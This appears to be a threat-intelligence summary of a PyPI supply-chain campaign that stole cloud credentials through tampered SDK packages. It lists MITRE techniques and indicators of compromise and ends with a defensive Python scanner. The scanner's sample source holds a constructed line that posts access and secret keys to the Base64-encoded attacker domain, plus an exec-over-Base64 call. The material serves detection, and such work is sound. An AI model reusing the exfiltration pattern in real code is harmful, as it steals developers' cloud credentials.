Cloud Provider Credentials Targeted in New PyPI Malware Campaign

Phylum reports a targeted PyPI campaign where packages purporting to be cloud provider SDKs were modified to exfiltrate credentials. Attackers obfuscated a POST request and preserved the original functionality of the packages to avoid detection while sending keys to an attacker-controlled URL. #PyPI #aliyun-sdk-requests #TencentCloud #AlibabaCloud #enumerate-iam #coinexchanged #weiwang3056

Keypoints

  • Attackers targeted widely-used cloud provider SDKs on PyPI to steal access and secret keys.
  • They inserted a small malicious modification into legitimate code to exfiltrate credentials via a crafted POST request.
  • The POST URL is Base64-encoded to evade basic detection, representing a simple obfuscation tactic.
  • Phylum has so far identified five PyPI packages in the campaign that follow the same exfiltration pattern.
  • The attackers aimed to preserve the original package functionality so developers would not notice the malicious change.
  • Maintainer activity and Whois records show several contributors and registration dates associated with the packages in this campaign.

MITRE Techniques

  • [T1195] Supply Chain Attack – The attacker first selected a small set of widely used cloud provider SDKs because those libraries inherently handle sensitive cloud credentials. ‘the attacker began by identifying a small set of widely-utilized cloud provider SDKs on account of their intrinsic capability of handling sensitive cloud credentials.’
  • [T1059.006] Python – The obfuscated POST request is executed via Python code using exec() on a Base64-encoded string that is decoded at runtime. ‘…obfuscate the entire POST request by calling exec() on a large Base64-encoded string that’s dynamically decoded at runtime.’
  • [T1027] Obfuscated/Compressed Data – The remote URL is Base64-encoded as a basic obfuscation attempt. ‘The remote URL was Base64-encoded in a rudimentary but clear obfuscation attempt.’
  • [T1041] Exfiltration Over C2 Channel – Exfiltration of cloud credentials to an attacker-controlled remote URL via HTTP POST. ‘exfiltrate those access and secret keys to an attacker-controlled remote URL.’
  • [T1195] Supply Chain Attack – Publication of multiple malicious PyPI packages that mimic legitimate ones to harvest credentials. ‘So far, we’ve identified five packages attempting to exfiltrate secrets in this manner to the same remote URL.’

Indicators of Compromise

  • [Base64-Encoded Strings] Context – aHR0cHM6Ly9hcGkuYWxpeXVuLXNkay1yZXF1ZXN0cy54eXovYWxpeXVu, aHR0cHM6Ly9hcGkuYWxpeXVuLXNkay1yZXF1ZXN0cy54eXovdGVuY2VudA
  • [Decoded URLs] Context – https://api[.]aliyun-sdk-requests[.]xyz/tencent, https://api[.]aliyun-sdk-requests[.]xyz/aliyun
  • [File] Path to modified files – common/credential.py, client.py, and 3 more files
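As an added example (not code from the Phylum post or from the packages it describes), the Python scanner below flags the two traits named under MITRE Techniques and Indicators of Compromise: string literals whose Base64 decoding contains a URL, and exec() calls fed by a runtime b64decode. It runs over a constructed source sample, and its decoder tolerates the missing '=' padding on the second Base64 string listed above.

```python
import ast
import base64
import binascii
import re
from typing import Optional

# Constructed sample (not code from the malicious packages) that mirrors the
# two traits reported: a Base64-encoded exfiltration URL decoded at runtime,
# and exec() over a Base64 blob. The exec payload here is just print('hi').
SAMPLE_SOURCE = '''
import base64, requests
def _send(ak, sk):
    url = base64.b64decode("aHR0cHM6Ly9hcGkuYWxpeXVuLXNkay1yZXF1ZXN0cy54eXovYWxpeXVu").decode()
    requests.post(url, json={"ak": ak, "sk": sk})
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
'''

B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
URL_RE = re.compile(r"https?://[^\s\"']+")


def decode_b64(text: str) -> Optional[str]:
    """Decode a Base64 literal as UTF-8 text, tolerating the missing '='
    padding seen in one of the reported strings; None if not valid Base64."""
    padded = text + "=" * (-len(text) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_source(source: str) -> dict:
    """Walk the AST and report (a) string literals whose Base64 decoding
    contains a URL and (b) exec() calls fed by a runtime b64decode."""
    findings = {"urls": [], "exec_b64": 0}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if B64_RE.match(node.value):
                decoded = decode_b64(node.value)
                if decoded and URL_RE.search(decoded):
                    findings["urls"].append((node.lineno, decoded))
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id == "exec" and "b64decode" in ast.dump(node)):
            findings["exec_b64"] += 1
    return findings


if __name__ == "__main__":
    print(scan_source(SAMPLE_SOURCE))
```

Pointing scan_source at each .py file in an unpacked wheel or sdist gives a quick triage of whether a package carries this campaign's pattern; a hit on either finding warrants a manual diff against the upstream SDK release.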

Read more: https://blog.phylum.io/cloud-provider-credentials-targeted-in-new-pypi-malware-campaign/